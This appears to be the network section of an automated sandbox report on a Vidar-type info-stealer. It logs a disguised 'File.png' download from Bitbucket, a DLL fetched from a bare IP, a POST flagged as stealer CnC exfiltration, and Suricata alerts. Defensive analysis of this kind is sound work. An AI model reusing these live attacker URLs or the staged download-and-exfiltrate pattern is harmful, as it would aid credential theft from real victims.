Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| bitbucket.org | 104.192.141.1 | |
| bbuseruploads.s3.amazonaws.com |
CNAME
s3-1-w.amazonaws.com
|
52.216.152.68 |
- UDP Requests
-
-
192.168.56.101:59369 164.124.101.2:53
-
192.168.56.101:61479 164.124.101.2:53
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
302
https://bitbucket.org/terrywells9609/rz/downloads/File.png
REQUEST
RESPONSE
BODY
GET /terrywells9609/rz/downloads/File.png HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
HTTP/1.1 302 Found
Content-Security-Policy-Report-Only: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://d301sr5gafysq2.cloudfront.net; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com https://d301sr5gafysq2.cloudfront.net; report-uri https://web-security-reports.services.atlassian.com/csp-report/bb-website; default-src 'self' 'unsafe-inline' 'unsafe-eval' data: blob: *; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com analytics.atlassian.com as.atlassian.com api-private.stg.atlassian.com api-private.atlassian.com cofs.staging.public.atl-paas.net cofs.prod.public.atl-paas.net intake.opbeat.com api.media.atlassian.com api.segment.io xid.statuspage.io xid.atlassian.com xid.sourcetreeapp.com bam.nr-data.net bam-cell.nr-data.net sentry.io bqlf8qjztdtr.statuspage.io https://d301sr5gafysq2.cloudfront.net; object-src about:; base-uri 'self'
Server: nginx
X-Usage-Quota-Remaining: 998607.756
Vary: Accept-Language, Origin
X-Usage-Request-Cost: 1420.80
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Type: text/html; charset=utf-8
X-B3-TraceId: 470dfe467669d9d9
X-Usage-Output-Ops: 0
X-Dc-Location: Micros
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Fri, 29 Oct 2021 09:22:32 GMT
X-Usage-User-Time: 0.042624
X-Usage-System-Time: 0.000000
Location: https://bbuseruploads.s3.amazonaws.com/7cb2b9a6-8bc3-49fe-a2b6-8e9aea534518/downloads/650c9764-176a-49cd-aad7-61d972772227/File.png?Signature=r3Je48wVNO1bvdlgEcYkhQoEbrA%3D&Expires=1635501151&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=HkGYJi0mLzSso6bzzsGO9Vs_9MOZYip6&response-content-disposition=attachment%3B%20filename%3D%22File.png%22
X-Served-By: b14472b5c8c8
Expires: Fri, 29 Oct 2021 09:22:31 GMT
Content-Language: en
X-View-Name: bitbucket.apps.downloads.views.download_file
X-Static-Version: 667d31475744
X-Render-Time: 0.101212024689
Connection: keep-alive
X-Usage-Input-Ops: 0
X-Request-Count: 4223
X-Frame-Options: SAMEORIGIN
X-Version: 667d31475744
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 0
GET
200
https://bbuseruploads.s3.amazonaws.com/7cb2b9a6-8bc3-49fe-a2b6-8e9aea534518/downloads/650c9764-176a-49cd-aad7-61d972772227/File.png?Signature=r3Je48wVNO1bvdlgEcYkhQoEbrA%3D&Expires=1635501151&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=HkGYJi0mLzSso6bzzsGO9Vs_9MOZYip6&response-content-disposition=attachment%3B%20filename%3D%22File.png%22
REQUEST
RESPONSE
BODY
GET /7cb2b9a6-8bc3-49fe-a2b6-8e9aea534518/downloads/650c9764-176a-49cd-aad7-61d972772227/File.png?Signature=r3Je48wVNO1bvdlgEcYkhQoEbrA%3D&Expires=1635501151&AWSAccessKeyId=AKIA6KOSE3BNJRRFUUX6&versionId=HkGYJi0mLzSso6bzzsGO9Vs_9MOZYip6&response-content-disposition=attachment%3B%20filename%3D%22File.png%22 HTTP/1.1
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
HTTP/1.1 200 OK
x-amz-id-2: n+VQl9fw8kmJY3jwPx8vnxYjyDyL0Xo042F9wvnpNtTv1aGW8Tqrucof+Fa8mxuhF3ioRTaSsiU=
x-amz-request-id: E9KFCD9JB5K61AK6
Date: Fri, 29 Oct 2021 09:22:33 GMT
Last-Modified: Thu, 28 Oct 2021 06:41:04 GMT
ETag: "1a9f4c5299b9757911a9b55673095d4c"
x-amz-version-id: HkGYJi0mLzSso6bzzsGO9Vs_9MOZYip6
Content-Disposition: attachment; filename="File.png"
Accept-Ranges: bytes
Content-Type: image/png
Server: AmazonS3
Content-Length: 280576
GET
200
http://136.144.41.229/public/sqlite3.dll
REQUEST
RESPONSE
BODY
GET /public/sqlite3.dll HTTP/1.1
Host: 136.144.41.229
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Fri, 29 Oct 2021 09:23:09 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Sun, 10 Oct 2021 06:50:40 GMT
ETag: "9d9d8-5cdfa07d39186"
Accept-Ranges: bytes
Content-Length: 645592
Content-Type: application/x-msdos-program
GET
200
http://136.144.41.229/gJCbU1V9y2.php
REQUEST
RESPONSE
BODY
GET /gJCbU1V9y2.php HTTP/1.1
Host: 136.144.41.229
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 29 Oct 2021 09:23:13 GMT
Server: Apache/2.4.18 (Ubuntu)
Set-Cookie: PHPSESSID=c24vr0gd99ol7miv84edmr62v3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST
200
http://136.144.41.229/gJCbU1V9y2.php
REQUEST
RESPONSE
BODY
POST /gJCbU1V9y2.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----MY58GDTJM7GVAAAI
Host: 136.144.41.229
Content-Length: 11864
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: PHPSESSID=c24vr0gd99ol7miv84edmr62v3
HTTP/1.1 200 OK
Date: Fri, 29 Oct 2021 09:23:14 GMT
Server: Apache/2.4.18 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 0
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 192.168.56.101:49201 -> 104.192.141.1:443 | 906200022 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 192.168.56.101:49205 -> 136.144.41.229:80 | 2027250 | ET INFO Dotted Quad Host DLL Request | Potentially Bad Traffic |
| TCP 192.168.56.101:49202 -> 52.217.200.129:443 | 906200022 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
| TCP 136.144.41.229:80 -> 192.168.56.101:49205 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 136.144.41.229:80 -> 192.168.56.101:49205 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
| TCP 192.168.56.101:49205 -> 136.144.41.229:80 | 2033163 | ET MALWARE Win32/Vidar Variant Stealer CnC Exfil | A Network Trojan was detected |
Suricata TLS
| Flow | Issuer | Subject | Fingerprint |
|---|---|---|---|
|
TLS 1.2 192.168.56.101:49201 104.192.141.1:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA | unknown=Private Organization, unknown=US, unknown=Delaware, serialNumber=3928449, C=US, ST=California, L=San Francisco, O=Atlassian, Inc., OU=Bitbucket, CN=bitbucket.org | 4e:6a:4c:3b:82:15:ef:df:97:38:5e:50:ef:b9:86:42:84:3b:89:f0 |
|
TLS 1.2 192.168.56.101:49202 52.217.200.129:443 |
C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert Baltimore CA-2 G2 | C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=*.s3.amazonaws.com | 90:e0:af:dc:fa:f7:0b:ac:50:bb:fa:43:e1:ec:e2:3d:ce:91:90:47 |
Snort Alerts
No Snort Alerts